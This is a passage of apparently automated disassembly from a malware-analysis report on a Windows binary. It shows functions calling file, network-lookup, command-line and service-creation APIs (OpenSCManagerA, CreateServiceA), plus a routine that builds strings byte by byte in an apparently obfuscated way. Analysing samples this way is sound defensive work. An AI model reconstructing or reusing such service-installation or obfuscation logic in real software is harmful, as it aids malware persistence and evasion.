0041C331 call 00419F3Ch
0041C336 mov dword ptr [ebp-10h], esi
0041C339 xor eax, eax
0041C33B mov dword ptr [ebp-0Ch], eax
0041C33E mov eax, dword ptr [ebp-0Ch]
0041C341 cmp eax, dword ptr [ebp-10h]
0041C344 jnl 0041C3D9h
0041C34A mov esi, dword ptr [ebp-10h] xrefs 0041C3D3
0041C34D sub esi, dword ptr [ebp-0Ch]
0041C350 mov eax, dword ptr [ebx+000001A4h]
0041C356 cmp esi, eax
0041C358 jle 0041C35Ch
0041C35A mov esi, eax
0041C35C test esi, esi xrefs 0041C358
0041C35E jle 0041C3D9h
0041C360 lea eax, dword ptr [ebx+7Ch]
0041C363 push eax
0041C364 mov ecx, dword ptr [ebx+78h]
0041C367 mov edx, esi
0041C369 mov eax, ebx
0041C36B call 004185FCh
0041C370 mov edx, dword ptr [ebp-0Ch]
0041C373 mov eax, dword ptr [ebp-04h]
0041C376 call 004159A0h
0041C37B mov ecx, esi
0041C37D mov edx, eax
0041C37F mov eax, dword ptr [ebx+00000200h]
0041C385 mov esi, dword ptr [eax]
0041C387 call dword ptr [esi+24h]
0041C38A mov esi, eax
0041C38C mov eax, dword ptr [ebx+00000200h]
0041C392 cmp dword ptr [eax+0Ch], 00000000h
0041C396 je 0041C3A2h
0041C398 mov dword ptr [ebx+000001B8h], 0000276Bh
0041C3A2 cmp dword ptr [ebx+000001B8h], 00000000h xrefs 0041C396
0041C3A9 jne 0041C3D9h
0041C3AB add dword ptr [ebp-0Ch], esi
0041C3AE add dword ptr [ebp-08h], esi
0041C3B1 add dword ptr [ebx+000001A0h], esi
0041C3B7 lea edx, dword ptr [ebp-14h]
0041C3BA mov eax, esi
0041C3BC call 004074CCh
0041C3C1 mov ecx, dword ptr [ebp-14h]
0041C3C4 mov dl, 0Bh
0041C3C6 mov eax, ebx
0041C3C8 call 00419E70h
0041C3CD mov eax, dword ptr [ebp-0Ch]
0041C3D0 cmp eax, dword ptr [ebp-10h]
0041C3D3 jl 0041C34Ah
0041C3D9 mov eax, ebx xrefs 0041C344, 0041C35E, 0041C3A9
0041C3DB call 0041952Ch
0041C3E0 jmp 0041C3F1h
0041C3E2 mov ecx, esi xrefs 0041C308
0041C3E4 mov edx, dword ptr [ebp-04h]
0041C3E7 mov eax, ebx
0041C3E9 call 00418720h
0041C3EE mov dword ptr [ebp-08h], eax
0041C3F1 xor eax, eax xrefs 0041C31C, 0041C3E0
0041C3F3 pop edx
0041C3F5 pop ecx Count = 2
0041C3F6 mov dword ptr fs:[eax], edx
0041C3F9 push 0041C40Eh
0041C3FE lea eax, dword ptr [ebp-14h] xrefs 0041C40C
0041C401 call 004043DCh
0041C406 ret function end
APIs
  • ExitThread.KERNEL32, ref: 004043D5
Address Instruction Meta Information
004043D4 push eax xrefs 0041316C
004043D5 call 00401210h ExitThread@KERNEL32.DLL (Hidden Import)
004043DA ret function end
APIs
  • CreateFileA.KERNEL32, ref: 00407842
Address Instruction Meta Information
004077F4 push ebx xrefs 00412334
004077F5 push esi
004077F6 push edi
004077F7 mov ebx, edx
004077F9 mov edi, eax
004077FB or eax, FFFFFFFFh
004077FE mov esi, ebx
00407800 and esi, 03h
00407803 cmp esi, 02h
00407806 jnbe 00407847h
00407808 mov edx, ebx
0040780A and edx, 000000F0h
00407810 cmp edx, 40h
00407813 jnbe 00407847h
00407815 push 00000000h
00407817 push 00000080h
0040781C push 00000003h
0040781E push 00000000h
00407820 mov eax, ebx
00407822 and eax, 000000F0h
00407827 shr eax, 04h
0040782A mov eax, dword ptr [0042B16Ch+eax*4]
00407831 push eax
00407832 mov eax, dword ptr [0042B160h+esi*4]
00407839 push eax
0040783A mov eax, edi
0040783C call 00404878h
00407841 push eax
00407842 call 0040610Ch CreateFileA@KERNEL32.DLL (Hidden Import)
00407847 pop edi xrefs 00407806, 00407813
00407848 pop esi
00407849 pop ebx
0040784A ret function end
APIs
  • inet_addr.WS2_32, ref: 004144FB
  • gethostbyaddr.WS2_32, ref: 0041452E
  • getaddrinfo.WS2_32, ref: 004145AA
  • getnameinfo.WS2_32, ref: 004145FC
  • FreeAddrInfoW.WS2_32, ref: 0041462E
Address Instruction Meta Information
004144AC push ebp xrefs 004199EC
004144AD mov ebp, esp
004144AF add esp, FFFFFFCCh
004144B2 push ebx
004144B3 push esi
004144B4 push edi
004144B5 xor ebx, ebx
004144B7 mov dword ptr [ebp-0Ch], ebx
004144BA mov dword ptr [ebp-10h], ebx
004144BD mov edi, ecx
004144BF mov esi, edx
004144C1 mov dword ptr [ebp-04h], eax
004144C4 mov ebx, dword ptr [ebp+08h]
004144C7 mov eax, dword ptr [ebp-04h]
004144CA call 00404868h
004144CF xor eax, eax
004144D1 push ebp
004144D2 push 0041465Fh
004144D7 push dword ptr fs:[eax]
004144DA mov dword ptr fs:[eax], esp
004144DD mov eax, ebx
004144DF mov edx, dword ptr [ebp-04h]
004144E2 call 00404430h
004144E7 mov eax, esi
004144E9 call 00413B74h
004144EE test al, al
004144F0 jne 00414562h
004144F2 mov eax, dword ptr [ebp-04h]
004144F5 call 00404878h
004144FA push eax
004144FB call dword ptr [0042B420h] inet_addr@WS2_32.DLL (Hidden Import)
00414501 mov dword ptr [ebp-14h], eax
00414504 cmp dword ptr [ebp-14h], FFFFFFFFh
00414508 je 0041463Ch
0041450E mov eax, dword ptr [0042C8A4h] 00960A4C
00414513 call 00413914h
00414518 xor eax, eax
0041451A push ebp
0041451B push 0041455Bh
00414520 push dword ptr fs:[eax]
00414523 mov dword ptr fs:[eax], esp
00414526 push 00000002h
00414528 push 00000004h
0041452A lea eax, dword ptr [ebp-14h]
0041452D push eax
0041452E call dword ptr [0042B3E8h] gethostbyaddr@WS2_32.DLL (Hidden Import)
00414534 mov esi, eax
00414536 test esi, esi
00414538 je 00414543h
0041453A mov eax, ebx
0041453C mov edx, dword ptr [esi]
0041453E call 004045D4h
00414543 xor eax, eax xrefs 00414538
00414545 pop edx
00414547 pop ecx Count = 2
00414548 mov dword ptr fs:[eax], edx
0041454B push 0041463Ch
00414550 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 00414560
00414555 call 0041391Ch
0041455A ret function end
00414562 xor eax, eax xrefs 004144F0
00414564 mov dword ptr [ebp-08h], eax
00414567 xor edx, edx
00414569 push ebp
0041456A push 00414635h
0041456F push dword ptr fs:[edx]
00414572 mov dword ptr fs:[edx], esp
00414575 lea eax, dword ptr [ebp-34h]
00414578 xor ecx, ecx
0041457A mov edx, 00000020h
0041457F call 00403030h
00414584 xor eax, eax
00414586 mov dword ptr [ebp-30h], eax
00414589 mov eax, dword ptr [ebp+0Ch]
0041458C mov dword ptr [ebp-2Ch], eax
0041458F mov dword ptr [ebp-28h], edi
00414592 xor eax, eax
00414594 mov dword ptr [ebp-34h], eax
00414597 lea eax, dword ptr [ebp-08h]
0041459A push eax
0041459B lea eax, dword ptr [ebp-34h]
0041459E push eax
0041459F push 00000000h
004145A1 mov eax, dword ptr [ebp-04h]
004145A4 call 00404878h
004145A9 push eax
004145AA call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
004145B0 test eax, eax
004145B2 jne 00414617h
004145B4 cmp dword ptr [ebp-08h], 00000000h
004145B8 je 00414617h
004145BA mov esi, 00000401h
004145BF mov edi, 00000020h
004145C4 lea eax, dword ptr [ebp-0Ch]
004145C7 mov edx, esi
004145C9 call 004049A8h
004145CE lea eax, dword ptr [ebp-10h]
004145D1 mov edx, edi
004145D3 call 004049A8h
004145D8 push 00000008h
004145DA push edi
004145DB mov eax, dword ptr [ebp-10h]
004145DE call 00404878h
004145E3 push eax
004145E4 push esi
004145E5 mov eax, dword ptr [ebp-0Ch]
004145E8 call 00404878h
004145ED push eax
004145EE mov eax, dword ptr [ebp-08h]
004145F1 mov eax, dword ptr [eax+10h]
004145F4 push eax
004145F5 mov eax, dword ptr [ebp-08h]
004145F8 mov eax, dword ptr [eax+18h]
004145FB push eax
004145FC call dword ptr [0042B454h] getnameinfo@WS2_32.DLL (Hidden Import)
00414602 test eax, eax
00414604 jne 00414617h
00414606 mov eax, dword ptr [ebp-0Ch]
00414609 call 00404878h
0041460E mov edx, eax
00414610 mov eax, ebx
00414612 call 004045D4h
00414617 xor eax, eax xrefs 004145B2, 004145B8, 00414604
00414619 pop edx
0041461B pop ecx Count = 2
0041461C mov dword ptr fs:[eax], edx
0041461F push 0041463Ch
00414624 cmp dword ptr [ebp-08h], 00000000h xrefs 0041463A
00414628 je 00414634h
0041462A mov eax, dword ptr [ebp-08h]
0041462D push eax
0041462E call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414634 ret xrefs 00414628 function end
0041463C xor eax, eax xrefs 00414508
0041463E pop edx
00414640 pop ecx Count = 2
00414641 mov dword ptr fs:[eax], edx
00414644 push 00414666h
00414649 lea eax, dword ptr [ebp-10h] xrefs 00414664
0041464C mov edx, 00000002h
00414651 call 00404400h
00414656 lea eax, dword ptr [ebp-04h]
00414659 call 004043DCh
0041465E ret function end
APIs
  • CloseHandle.KERNEL32, ref: 00412EE8
Address Instruction Meta Information
00412ED8 push 0042C860h xrefs 004136B1
00412EDD call 00406114h
00412EE2 mov eax, dword ptr [0042C848h] 00000048
00412EE7 push eax
00412EE8 call 004060ECh CloseHandle@KERNEL32.DLL (Hidden Import)
00412EED ret function end
APIs
  • GetCommandLineA.KERNEL32, ref: 004029F2
Address Instruction Meta Information
004029BC push ebx xrefs 00429EAD
004029BD push esi
004029BE push edi
004029BF add esp, FFFFFEF8h
004029C5 mov ebx, edx
004029C7 mov esi, eax
004029C9 mov eax, ebx
004029CB call 004043DCh
004029D0 test esi, esi
004029D2 jne 004029F2h
004029D4 push 00000105h
004029D9 lea eax, dword ptr [esp+04h]
004029DD push eax
004029DE push 00000000h
004029E0 call 00401258h
004029E5 mov ecx, eax
004029E7 mov edx, esp
004029E9 mov eax, ebx
004029EB call 004044CCh
004029F0 jmp 00402A10h
004029F2 call 00401240h GetCommandLineA@KERNEL32.DLL (Hidden Import) xrefs 004029D2
004029F7 mov edi, eax
004029F9 mov edx, ebx xrefs 00402A0E
004029FB mov eax, edi
004029FD call 004028D0h
00402A02 mov edi, eax
00402A04 test esi, esi
00402A06 je 00402A10h
00402A08 cmp dword ptr [ebx], 00000000h
00402A0B je 00402A10h
00402A0D dec esi
00402A0E jmp 004029F9h
00402A10 add esp, 00000108h xrefs 00402A06, 00402A0B, 004029F0
00402A16 pop edi
00402A17 pop esi
00402A18 pop ebx
00402A19 ret function end
APIs
  • CompareStringA.KERNEL32, ref: 004073D9
Address Instruction Meta Information
004073AC push ebx xrefs 004073EE, 0040990F, 00409D7F, 00409DA9, 004118BC, 00411F24
004073AD push esi
004073AE mov esi, edx
004073B0 mov ebx, eax
004073B2 mov eax, esi
004073B4 call 00404678h
004073B9 push eax
004073BA mov eax, esi
004073BC call 00404878h
004073C1 push eax
004073C2 mov eax, ebx
004073C4 call 00404678h
004073C9 push eax
004073CA mov eax, ebx
004073CC call 00404878h
004073D1 push eax
004073D2 push 00000001h
004073D4 push 00000400h
004073D9 call 004060F4h CompareStringA@KERNEL32.DLL (Hidden Import)
004073DE sub eax, 02h
004073E1 pop esi
004073E2 pop ebx
004073E3 ret function end
APIs
  • OpenSCManagerA.ADVAPI32, ref: 00429AC4
  • CreateServiceA.ADVAPI32, ref: 00429AF5
  • CloseServiceHandle.ADVAPI32, ref: 00429AFD
Address Instruction Meta Information
00429AB4 push ebx xrefs 00429ECE
00429AB5 push esi
00429AB6 push edi
00429AB7 push ebp
00429AB8 mov ebp, edx
00429ABA mov edi, eax
00429ABC xor ebx, ebx
00429ABE push 00000002h
00429AC2 push 00000000h Count = 2
00429AC4 call 00421BC4h OpenSCManagerA@ADVAPI32.DLL (Hidden Import)
00429AC9 mov esi, eax
00429ACB test esi, esi
00429ACD je 00429B0Ch
00429AD7 push 00000000h Count = 5
00429AD9 push edi
00429ADA push 00000001h
00429ADC push 00000002h
00429ADE push 00000110h
00429AE3 push 000F0000h
00429AE8 mov eax, dword ptr [0042DAA0h] 00961190
00429AED call 00404878h
00429AF2 push eax
00429AF3 push ebp
00429AF4 push esi
00429AF5 call 00421BCCh CreateServiceA@ADVAPI32.DLL (Hidden Import)
00429AFA mov ebx, eax
00429AFC push esi
00429AFD call 00421B64h CloseServiceHandle@ADVAPI32.DLL (Hidden Import)
00429B02 test ebx, ebx
00429B04 je 00429B0Ah
00429B06 mov bl, 01h
00429B08 jmp 00429B0Ch
00429B0A xor ebx, ebx xrefs 00429B04
00429B0C mov eax, ebx xrefs 00429ACD, 00429B08
00429B0E pop ebp
00429B0F pop edi
00429B10 pop esi
00429B11 pop ebx
00429B12 ret function end
Address Instruction Meta Information
00418AA4 push ebp xrefs 0041C2AD
00418AA5 mov ebp, esp
00418AA7 add esp, FFFFFFF0h
00418AAA push ebx
00418AAB push esi
00418AAC push edi
00418AAD xor ebx, ebx
00418AAF mov dword ptr [ebp-10h], ebx
00418AB2 mov ebx, ecx
00418AB4 mov dword ptr [ebp-08h], edx
00418AB7 mov dword ptr [ebp-04h], eax
00418ABA xor eax, eax
00418ABC push ebp
00418ABD push 00418BBAh
00418AC2 push dword ptr fs:[eax]
00418AC5 mov dword ptr fs:[eax], esp
00418AC8 xor eax, eax
00418ACA mov dword ptr [ebp-0Ch], eax
00418ACD mov eax, dword ptr [ebp-04h]
00418AD0 call 004186ECh
00418AD5 test al, al
00418AD7 jne 00418BA4h
00418ADD mov eax, dword ptr [ebp-04h]
00418AE0 add eax, 00000084h
00418AE5 push eax
00418AE6 mov eax, dword ptr [ebp-04h]
00418AE9 mov ecx, dword ptr [eax+00000080h]
00418AEF mov edx, ebx
00418AF1 mov eax, dword ptr [ebp-04h]
00418AF4 call 004185FCh
00418AF9 xor eax, eax
00418AFB push ebp
00418AFC push 00418B29h
00418B01 push dword ptr fs:[eax]
00418B04 mov dword ptr fs:[eax], esp
00418B07 push 00000000h
00418B09 mov eax, dword ptr [ebp-04h]
00418B0C mov eax, dword ptr [eax+000001B4h]
00418B12 mov ecx, ebx
00418B14 mov edx, dword ptr [ebp-08h]
00418B17 call 00413AF0h
00418B1C mov dword ptr [ebp-0Ch], eax
00418B1F xor eax, eax
00418B21 pop edx
00418B23 pop ecx Count = 2
00418B24 mov dword ptr fs:[eax], edx
00418B27 jmp 00418B33h
00418B33 cmp dword ptr [ebp-0Ch], 00000000h xrefs 00418B27
00418B37 jne 00418B48h
00418B39 mov eax, dword ptr [ebp-04h]
00418B3C mov dword ptr [eax+000001B8h], 00002746h
00418B46 jmp 00418B53h
00418B48 mov edx, dword ptr [ebp-0Ch] xrefs 00418B37
00418B4B mov eax, dword ptr [ebp-04h]
00418B4E mov ecx, dword ptr [eax]
00418B50 call dword ptr [ecx+78h]
00418B53 mov eax, dword ptr [ebp-04h] xrefs 00418B46
00418B56 call 0041952Ch
00418B5B cmp dword ptr [ebp-0Ch], 00000000h
00418B5F jle 00418BA4h
00418B61 mov eax, dword ptr [ebp-04h]
00418B64 mov edx, dword ptr [ebp-0Ch]
00418B67 add dword ptr [eax+0000019Ch], edx
00418B6D lea edx, dword ptr [ebp-10h]
00418B70 mov eax, dword ptr [ebp-0Ch]
00418B73 call 004074CCh
00418B78 mov ecx, dword ptr [ebp-10h]
00418B7B mov dl, 0Ah
00418B7D mov eax, dword ptr [ebp-04h]
00418B80 call 00419E70h
00418B85 mov eax, dword ptr [ebp-0Ch]
00418B88 push eax
00418B89 mov ecx, dword ptr [ebp-08h]
00418B8C xor edx, edx
00418B8E mov eax, dword ptr [ebp-04h]
00418B91 call 00419F3Ch
00418B96 lea ecx, dword ptr [ebp-0Ch]
00418B99 mov edx, dword ptr [ebp-08h]
00418B9C mov eax, dword ptr [ebp-04h]
00418B9F call 00419E88h
00418BA4 xor eax, eax xrefs 00418AD7, 00418B5F
00418BA6 pop edx
00418BA8 pop ecx Count = 2
00418BA9 mov dword ptr fs:[eax], edx
00418BAC push 00418BC1h
00418BB1 lea eax, dword ptr [ebp-10h] xrefs 00418BBF
00418BB4 call 004043DCh
00418BB9 ret function end
APIs
  • RtlEnterCriticalSection.NTDLL, ref: 0040F3FE
  • RtlLeaveCriticalSection.NTDLL, ref: 0040F46A
Address Instruction Meta Information
0040F3C8 push ebp xrefs 0040EFE7, 0040DAE6, 0040DE08, 0040E0F9, 0040E7F0, 0040F1F3, 0040F1AB
0040F3C9 mov ebp, esp
0040F3CB push ecx
0040F3CC push ebx
0040F3CD push esi
0040F3CE push edi
0040F3CF mov esi, edx
0040F3D1 mov ebx, eax
0040F3D3 cmp dword ptr [0042C81Ch], 00000000h
0040F3DA je 0040F3EAh
0040F3DC cmp bx, 0100h
0040F3E1 jc 0040F3EAh
0040F3E3 cmp bx, 07FFh
0040F3E8 jbe 0040F3EEh
0040F3EA xor eax, eax xrefs 0040F3DA, 0040F3E1
0040F3EC jmp 0040F3F0h
0040F3EE mov al, 01h xrefs 0040F3E8
0040F3F0 mov byte ptr [ebp-01h], al xrefs 0040F3EC
0040F3F3 cmp byte ptr [ebp-01h], 00000000h
0040F3F7 je 0040F477h
0040F3F9 push 0042C820h
0040F3FE call 0040611Ch RtlEnterCriticalSection@NTDLL.DLL (Hidden Import)
0040F403 xor eax, eax
0040F405 push ebp
0040F406 push 0040F470h
0040F40B push dword ptr fs:[eax]
0040F40E mov dword ptr fs:[eax], esp
0040F411 mov eax, dword ptr [0042C81Ch] 00000000
0040F416 call 0040508Ch
0040F41B movzx edi, bx
0040F41E mov edx, edi
0040F420 sub edx, 00000100h
0040F426 cmp eax, edx
0040F428 setnle byte ptr [ebp-01h]
0040F42C cmp byte ptr [ebp-01h], 00000000h
0040F430 je 0040F458h
0040F432 mov eax, dword ptr [0042C81Ch] 00000000
0040F437 mov eax, dword ptr [eax+edi*4-00000400h]
0040F43E mov dword ptr [esi], eax
0040F440 cmp dword ptr [esi], 00000000h
0040F443 je 0040F44Fh
0040F445 mov eax, dword ptr [esi]
0040F447 cmp eax, dword ptr [0042B344h] FFFFFFFF
0040F44D jne 0040F453h
0040F44F xor eax, eax xrefs 0040F443
0040F451 jmp 0040F455h
0040F453 mov al, 01h xrefs 0040F44D
0040F455 mov byte ptr [ebp-01h], al xrefs 0040F451
0040F458 xor eax, eax xrefs 0040F430
0040F45A pop edx
0040F45C pop ecx Count = 2
0040F45D mov dword ptr fs:[eax], edx
0040F460 push 0040F477h
0040F465 push 0042C820h xrefs 0040F475
0040F46A call 0040623Ch RtlLeaveCriticalSection@NTDLL.DLL (Hidden Import)
0040F46F ret function end
0040F477 mov al, byte ptr [ebp-01h] xrefs 0040F3F7
0040F47A pop edi
0040F47B pop esi
0040F47C pop ebx
0040F47D pop ecx
0040F47E pop ebp
0040F47F ret function end
Address Instruction Meta Information
00421DD8 push ebp xrefs 0042251A
00421DD9 mov ebp, esp
00421DDB add esp, FFFFFD08h
00421DE1 push ebx
00421DE2 push esi
00421DE3 push edi
00421DE4 xor edx, edx
00421DE6 mov dword ptr [ebp-000002F8h], edx
00421DEC mov dword ptr [ebp-000002F0h], edx
00421DF2 mov dword ptr [ebp-000002F4h], edx
00421DF8 mov dword ptr [ebp-000002E8h], edx
00421DFE mov dword ptr [ebp-000002ECh], edx
00421E04 mov dword ptr [ebp-000002A4h], edx
00421E0A mov dword ptr [ebp-000002A8h], edx
00421E10 mov dword ptr [ebp-04h], edx
00421E13 mov esi, eax
00421E15 xor eax, eax
00421E17 push ebp
00421E18 push 004224F5h
00421E1D push dword ptr fs:[eax]
00421E20 mov dword ptr fs:[eax], esp
00421E23 xor eax, eax
00421E25 push ebp
00421E26 push 004224B5h
00421E2B push dword ptr fs:[eax]
00421E2E mov dword ptr fs:[eax], esp
00421E31 mov ebx, 00000001h
00421E36 lea edx, dword ptr [ebp-000002A4h]
00421E3C mov ax, 001Ch
00421E40 call 00421CB8h
00421E45 lea eax, dword ptr [ebp-000002A4h]
00421E4B push eax
00421E4C lea eax, dword ptr [ebp-000002ACh]
00421E52 imul edx, ebx, 5Ah
00421E55 mov edi, ebx
00421E57 add edi, edi
00421E59 add edx, edi
00421E5B mov byte ptr [eax+01h], dl
00421E5E mov byte ptr [eax], 00000001h
00421E61 lea edx, dword ptr [ebp-000002ACh]
00421E67 lea eax, dword ptr [ebp-000002B0h]
00421E6D call 00402EFCh
00421E72 lea eax, dword ptr [ebp-000002B4h]
00421E78 mov edx, ebx
00421E7A shl edx, 02h
00421E7D push edx
00421E7E mov edx, 00000077h
00421E83 pop ecx
00421E84 sub edx, ecx
00421E86 mov byte ptr [eax+01h], dl
00421E89 mov byte ptr [eax], 00000001h
00421E8C lea edx, dword ptr [ebp-000002B4h]
00421E92 lea eax, dword ptr [ebp-000002B0h]
00421E98 mov cl, 02h
00421E9A call 00402ECCh
00421E9F lea edx, dword ptr [ebp-000002B0h]
00421EA5 lea eax, dword ptr [ebp-000002B8h]
00421EAB call 00402EFCh
00421EB0 lea eax, dword ptr [ebp-000002B4h]
00421EB6 lea edx, dword ptr [ebx+4Bh]
00421EB9 mov byte ptr [eax+01h], dl
00421EBC mov byte ptr [eax], 00000001h
00421EBF lea edx, dword ptr [ebp-000002B4h]
00421EC5 lea eax, dword ptr [ebp-000002B8h]
00421ECB mov cl, 03h
00421ECD call 00402ECCh
00421ED2 lea edx, dword ptr [ebp-000002B8h]
00421ED8 lea eax, dword ptr [ebp-000002C0h]
00421EDE call 00402EFCh
00421EE3 lea eax, dword ptr [ebp-000002B4h]
00421EE9 lea edx, dword ptr [ebx+ebx+52h]
00421EED mov byte ptr [eax+01h], dl
00421EF0 mov byte ptr [eax], 00000001h
00421EF3 lea edx, dword ptr [ebp-000002B4h]
00421EF9 lea eax, dword ptr [ebp-000002C0h]
00421EFF mov cl, 04h
00421F01 call 00402ECCh
00421F06 lea edx, dword ptr [ebp-000002C0h]
00421F0C lea eax, dword ptr [ebp-000002C8h]
00421F12 call 00402EFCh
00421F17 lea eax, dword ptr [ebp-000002B4h]
00421F1D mov edx, 00000030h
00421F22 sub edx, edi
00421F24 mov byte ptr [eax+01h], dl
00421F27 mov byte ptr [eax], 00000001h
00421F2A lea edx, dword ptr [ebp-000002B4h]
00421F30 lea eax, dword ptr [ebp-000002C8h]
00421F36 mov cl, 05h
00421F38 call 00402ECCh
00421F3D lea edx, dword ptr [ebp-000002C8h]
00421F43 lea eax, dword ptr [ebp-000002D0h]
00421F49 call 00402EFCh
00421F4E lea eax, dword ptr [ebp-000002B4h]
00421F54 lea edx, dword ptr [ebx+64h]
00421F57 mov byte ptr [eax+01h], dl
00421F5A mov byte ptr [eax], 00000001h
00421F5D lea edx, dword ptr [ebp-000002B4h]
00421F63 lea eax, dword ptr [ebp-000002D0h]
00421F69 mov cl, 06h
00421F6B call 00402ECCh
00421F70 lea edx, dword ptr [ebp-000002D0h]
00421F76 lea eax, dword ptr [ebp-000002D8h]
00421F7C call 00402EFCh
00421F81 lea eax, dword ptr [ebp-000002B4h]
00421F87 mov edx, ebx
00421F89 add edx, edx
00421F8B add edx, 76h
00421F8E mov byte ptr [eax+01h], dl
00421F91 mov byte ptr [eax], 00000001h
00421F94 lea edx, dword ptr [ebp-000002B4h]
00421F9A lea eax, dword ptr [ebp-000002D8h]
00421FA0 mov cl, 07h
00421FA2 call 00402ECCh
00421FA7 lea edx, dword ptr [ebp-000002D8h]
00421FAD lea eax, dword ptr [ebp-000002E4h]
00421FB3 call 00402EFCh
00421FB8 lea eax, dword ptr [ebp-000002B4h]
00421FBE imul edx, ebx, 0Bh
00421FC1 add edx, 5Bh
00421FC4 mov byte ptr [eax+01h], dl
00421FC7 mov byte ptr [eax], 00000001h
00421FCA lea edx, dword ptr [ebp-000002B4h]
00421FD0 lea eax, dword ptr [ebp-000002E4h]
00421FD6 mov cl, 08h
00421FD8 call 00402ECCh
00421FDD lea edx, dword ptr [ebp-000002E4h]
00421FE3 lea eax, dword ptr [ebp-000002A8h]
00421FE9 call 00404640h
00421FEE mov edx, dword ptr [ebp-000002A8h]
00421FF4 pop eax
00421FF5 call 00404680h
00421FFA mov eax, dword ptr [ebp-000002A4h]
00422000 call 00407978h
00422005 test al, al
00422007 jne 0042225Dh
0042200D lea edx, dword ptr [ebp-000002E8h]
00422013 mov ax, 001Ch
00422017 call 00421CB8h
0042201C lea eax, dword ptr [ebp-000002E8h]
00422022 push eax
00422023 lea eax, dword ptr [ebp-000002ACh]
00422029 imul edx, ebx, 5Ah
0042202C mov ecx, ebx
0042202E add ecx, ecx
00422030 add edx, ecx
00422032 mov byte ptr [eax+01h], dl
00422035 mov byte ptr [eax], 00000001h
00422038 lea edx, dword ptr [ebp-000002ACh]
0042203E lea eax, dword ptr [ebp-000002B0h]
00422044 call 00402EFCh
00422049 lea eax, dword ptr [ebp-000002B4h]
0042204F mov edx, ebx
00422051 shl edx, 02h
00422054 push edx
00422055 mov edx, 00000077h
0042205A pop ecx
0042205B sub edx, ecx
0042205D mov byte ptr [eax+01h], dl
00422060 mov byte ptr [eax], 00000001h
00422063 lea edx, dword ptr [ebp-000002B4h]
00422069 lea eax, dword ptr [ebp-000002B0h]
0042206F mov cl, 02h
00422071 call 00402ECCh
00422076 lea edx, dword ptr [ebp-000002B0h]
0042207C lea eax, dword ptr [ebp-000002B8h]
00422082 call 00402EFCh
00422087 lea eax, dword ptr [ebp-000002B4h]
0042208D lea edx, dword ptr [ebx+4Bh]
00422090 mov byte ptr [eax+01h], dl
00422093 mov byte ptr [eax], 00000001h
00422096 lea edx, dword ptr [ebp-000002B4h]
0042209C lea eax, dword ptr [ebp-000002B8h]
004220A2 mov cl, 03h
004220A4 call 00402ECCh
004220A9 lea edx, dword ptr [ebp-000002B8h]
004220AF lea eax, dword ptr [ebp-000002C0h]
004220B5 call 00402EFCh
004220BA lea eax, dword ptr [ebp-000002B4h]
004220C0 lea edx, dword ptr [ebx+ebx+52h]
004220C4 mov byte ptr [eax+01h], dl
004220C7 mov byte ptr [eax], 00000001h
004220CA lea edx, dword ptr [ebp-000002B4h]
004220D0 lea eax, dword ptr [ebp-000002C0h]
004220D6 mov cl, 04h
004220D8 call 00402ECCh
004220DD lea edx, dword ptr [ebp-000002C0h]
004220E3 lea eax, dword ptr [ebp-000002C8h]
004220E9 call 00402EFCh
004220EE lea eax, dword ptr [ebp-000002B4h]
004220F4 mov edx, ebx
004220F6 add edx, edx
004220F8 push edx
004220F9 mov edx, 00000030h
004220FE pop ecx
004220FF sub edx, ecx
00422101 mov byte ptr [eax+01h], dl
00422104 mov byte ptr [eax], 00000001h
00422107 lea edx, dword ptr [ebp-000002B4h]
0042210D lea eax, dword ptr [ebp-000002C8h]
00422113 mov cl, 05h
00422115 call 00402ECCh
0042211A lea edx, dword ptr [ebp-000002C8h]
00422120 lea eax, dword ptr [ebp-000002D0h]
00422126 call 00402EFCh
0042212B lea eax, dword ptr [ebp-000002B4h]
00422131 lea edx, dword ptr [ebx+64h]
00422134 mov byte ptr [eax+01h], dl
00422137 mov byte ptr [eax], 00000001h
0042213A lea edx, dword ptr [ebp-000002B4h]
00422140 lea eax, dword ptr [ebp-000002D0h]
00422146 mov cl, 06h
00422148 call 00402ECCh
0042214D lea edx, dword ptr [ebp-000002D0h]
00422153 lea eax, dword ptr [ebp-000002D8h]
00422159 call 00402EFCh
0042215E lea eax, dword ptr [ebp-000002B4h]
00422164 mov edx, ebx
00422166 add edx, edx
00422168 add edx, 76h
0042216B mov byte ptr [eax+01h], dl
0042216E mov byte ptr [eax], 00000001h
00422171 lea edx, dword ptr [ebp-000002B4h]
00422177 lea eax, dword ptr [ebp-000002D8h]
0042217D mov cl, 07h
0042217F call 00402ECCh
00422184 lea edx, dword ptr [ebp-000002D8h]
0042218A lea eax, dword ptr [ebp-000002E4h]
00422190 call 00402EFCh
00422195 lea eax, dword ptr [ebp-000002B4h]
0042219B imul edx, ebx, 0Bh
0042219E add edx, 5Bh
004221A1 mov byte ptr [eax+01h], dl
004221A4 mov byte ptr [eax], 00000001h
004221A7 lea edx, dword ptr [ebp-000002B4h]
004221AD lea eax, dword ptr [ebp-000002E4h]
004221B3 mov cl, 08h
004221B5 call 00402ECCh
004221BA lea edx, dword ptr [ebp-000002E4h]
004221C0 lea eax, dword ptr [ebp-000002ECh]
004221C6 call 00404640h
004221CB mov edx, dword ptr [ebp-000002ECh]
004221D1 pop eax
004221D2 call 00404680h
004221D7 mov edx, dword ptr [ebp-000002E8h]
004221DD lea eax, dword ptr [ebp-000002A0h]
004221E3 call 00402CDCh
004221E8 mov edx, 00000001h
004221ED lea eax, dword ptr [ebp-000002A0h]
004221F3 call 00403190h
004221F8 call 004027F0h
004221FD xor ebx, ebx
004221FF lea edx, dword ptr [ebp-04h]
00422202 mov eax, 00000020h
00422207 call 00421D34h
0042220C mov eax, esi
0042220E mov edx, dword ptr [ebp-04h]
00422211 call 00404430h
00422216 jmp 0042223Ch
00422218 inc ebx xrefs 00422246
00422219 push 00000000h
0042221B lea eax, dword ptr [ebp-04h]
0042221E call 004048D0h
00422223 lea edx, dword ptr [eax+ebx-01h]
00422227 mov ecx, 00000001h
0042222C lea eax, dword ptr [ebp-000002A0h]
00422232 call 00402E54h
00422237 call 004027F0h
0042223C mov eax, dword ptr [ebp-04h] xrefs 00422216
0042223F call 00404678h
00422244 cmp ebx, eax
00422246 jl 00422218h
00422248 lea eax, dword ptr [ebp-000002A0h]
0042224E call 00402E74h
00422253 call 004027F0h
00422258 jmp 004224ABh
0042225D lea edx, dword ptr [ebp-000002F0h] xrefs 00422007
00422263 mov ax, 001Ch
00422267 call 00421CB8h
0042226C lea eax, dword ptr [ebp-000002F0h]
00422272 push eax
00422273 lea eax, dword ptr [ebp-000002ACh]
